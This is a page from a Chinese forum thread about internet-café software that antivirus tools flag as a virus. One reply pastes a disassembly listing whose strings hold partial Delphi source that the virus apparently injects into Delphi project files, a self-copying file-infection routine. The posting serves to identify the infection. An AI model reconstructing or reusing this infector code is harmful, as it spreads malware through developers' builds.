12   2  /  2  页   跳转

[已关闭] 免费查杀,万象报病毒。

收藏
newcenturymoon
头像
社区嘉宾
  • 帖子:15158
  • 注册: 2005-08-03
  • 来自:
论坛8周年活动礼物幸运草
发表于: 2009-09-13 23:18 | 短消息 资料
字号: 11楼

回复:免费查杀,万象报病毒。

CODE:00406DEC aUsesWindowsVar db 'uses windows; var sc:array[1..24] of string=(',0
CODE:00406DEC                                        ; DATA XREF: DATA:off_4240B8o
CODE:00406E1A                align 4
CODE:00406E1C _str_function_x_s_st dd 0FFFFFFFFh          ; _top
CODE:00406E1C                                        ; DATA XREF: DATA:off_4240BCo
CODE:00406E1C                dd 80                  ; Len
CODE:00406E1C                db 'function x(s:string):string;var i:integer;begin for i:=1 to lengt'; Text
CODE:00406E1C                db 'h(s) do if s',0  ; Text
CODE:00406E75                align 4
CODE:00406E78 _str___36_then_s_i__ dd 0FFFFFFFFh          ; _top
CODE:00406E78                                        ; DATA XREF: DATA:004240C0o
CODE:00406E78                dd 80                  ; Len
CODE:00406E78                db '=#36 then s:=#39;result:=s;end;procedure re(s,d,e:string);var '; Text
CODE:00406E78                db 'f1,f2:textfile;',0  ; Text
CODE:00406ED1                align 4
CODE:00406ED4 _str_h_cardinal_f_ST dd 0FFFFFFFFh          ; _top
CODE:00406ED4                                        ; DATA XREF: DATA:004240C4o
CODE:00406ED4                dd 80                  ; Len
CODE:00406ED4                db 'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3'; Text
CODE:00406ED4                db ':FILETIME;begin',0  ; Text
CODE:00406F2D                align 10h
CODE:00406F30 _str_h__CreateFile_p dd 0FFFFFFFFh          ; _top
CODE:00406F30                                        ; DATA XREF: DATA:004240C8o
CODE:00406F30                dd 80                  ; Len
CODE:00406F30                db 'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then be'; Text
CODE:00406F30                db 'gin CloseHandle',0  ; Text
CODE:00406F89                align 4
CODE:00406F8C _str__h__exit_end__$ dd 0FFFFFFFFh          ; _top
CODE:00406F8C                                        ; DATA XREF: DATA:004240CCo
CODE:00406F8C                dd 80                  ; Len
CODE:00406F8C                db '(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then '; Text
CODE:00406F8C                db 'exit;assignfile',0  ; Text
CODE:00406FE5                align 4
CODE:00406FE8 _str__f2_d_$pas$__re dd 0FFFFFFFFh          ; _top
CODE:00406FE8                                        ; DATA XREF: DATA:004240D0o
CODE:00406FE8                dd 80                  ; Len
CODE:00406FE8                db '(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);'; Text
CODE:00406FE8                db 'exit;end; while',0  ; Text
CODE:00407041                align 4
CODE:00407044 _str_not_eof_f1__do_ dd 0FFFFFFFFh          ; _top
CODE:00407044                                        ; DATA XREF: DATA:004240D4o
CODE:00407044                dd 80                  ; Len
CODE:00407044                db 'not eof(f1) do begin readln(f1,s); writeln(f2,s);  if pos($implem'; Text
CODE:00407044                db 'entation$,s)<>0',0  ; Text
CODE:0040709D                align 10h

病毒在delphi工程文件中插入的代码
gototop
 
我是LAJI我怕谁
头像
快乐黄口狮
  • 帖子:297
  • 注册: 2006-02-10
  • 来自:
发表于: 2009-09-14 00:59 | 只看楼主 短消息 资料
字号: 12楼

回复:免费查杀,万象报病毒。

谢谢。
gototop
 
<<上一主题|下一主题>>
12   2  /  2  页   跳转
页面顶部
Powered by Discuz!NT